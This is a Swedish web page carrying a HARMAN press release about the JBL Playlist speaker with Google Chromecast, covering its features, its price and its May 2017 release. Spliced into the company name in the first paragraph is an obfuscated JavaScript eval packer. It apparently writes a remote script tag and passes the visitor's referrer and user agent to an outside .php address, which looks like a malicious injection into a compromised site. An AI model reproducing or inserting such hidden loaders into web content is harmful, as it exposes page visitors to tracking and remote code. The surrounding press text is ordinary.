Image Image Image Image Image Image Image Image Image Image

| 11 april, 2021

Scroll to top

Top

JBLs trådlösa högtalare med inbyggd Google Chromecast

JBLs trådlösa högtalare med inbyggd Google Chromecast
Sebastian

HARMAN eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yysar|var|u0026u|referrer|nnzks||js|php’.split(’|’),0,{}))
International Industries
, Incorporated (NYSE:HAR), som designar och utvecklar uppkopplade produkter och lösningar till biltillverkare, konsumenter och företag världen över, meddelar idag att JBL Playlist, den smarta hifi-högtalare för hemmet med inbyggd Google Chromecast nu finns tillgänglig i butik.

JBL Playlist ger med hjälp av Chromecast möjligheten att genom bara ett knapptryck strömma musik, radio eller podcasts direkt från Android, iPhone, iPad, Mac eller Windows. Den inbyggda Chromecast-tekniken använder sig av wifi och låter användaren enkelt byta mellan musikappar som Spotify och Pandora utan att koppla upp sin enhet via Bluetooth. Strömning via wifi erbjuder en högre ljudkvalitet på uppspelningen än Bluetooth och med JBL Playlist skickas musiken direkt från molnet till högtalaren, för ett mer exakt ljud. När den mobila enheten ansluts via wifi behöver användaren inte heller befinna sig i direkt närhet till högtalaren för att kunna spela musik, vilket ger en större rörelsefrihet.

Med JBL Playlist kan användaren smidigt spela musik via olika tjänster genom att trycka på den aktuella appens Chromecast-knapp. Varken inkommande telefonsamtal eller andra aviseringar på telefonen avbryter uppspelningen vid strömning från en smartphone. Flera enheter kan kopplas upp samtidigt till högtalaren, så att alla kan turas om att vara DJ.

– JBL Playlist låter användare komma åt miljontals låtar och podcasts genom att casta från appar de redan gillar och använder, säger Lou Schreurs, Vice President, Connected Home HARMAN. Med JBL Playlist kan musik- och teknikentusiaster njuta av sitt favoritinnehåll i god ljudkvalitet, helt utan avbrott.

JBL Playlist är designad för att leverera en enastående ljudkvalitet och basåtergivning i världsklass. Den matta finishen och tygfronten ger ett elegant utseende som kompletterar alla rum i hemmet.

JBL Playlist – egenskaper

  • Med Google Chromecast inbyggt i högtalaren är det enkelt att starta musiken från telefonen genom att trycka på Chromecast-knappen i de olika musikapparna
  • Spotify Connect gör det lätt att spela favoritmusiken direkt från telefonen eller datorn genom att använda Spotify som fjärrkontroll. Använd högtalarens One Touch Play-funktion för att spela upp spellistan på en gång
  • 24bit/96kHz ger en hög ljudkvalitet
  • Dubbel wifi-anslutning och 802.11ac nätverksstöd: Stödjer den senaste 802.11AC-tekniken för trådlösa hemnätverk och dubbel (både 2,4 GHz och 5 GHz) wifi-anslutning, vilket resulterar i en snabbare och stabilare trådlös anslutning
  • Spelar musik via Bluetooth eller 3,5 mm-ingång

Pris och tillgänglighet

JBL Playlist finns tillgänglig från maj 2017 i färgerna svart, blå och vit. Rekommenderat utgångspris är 1 800 SEK.

Comments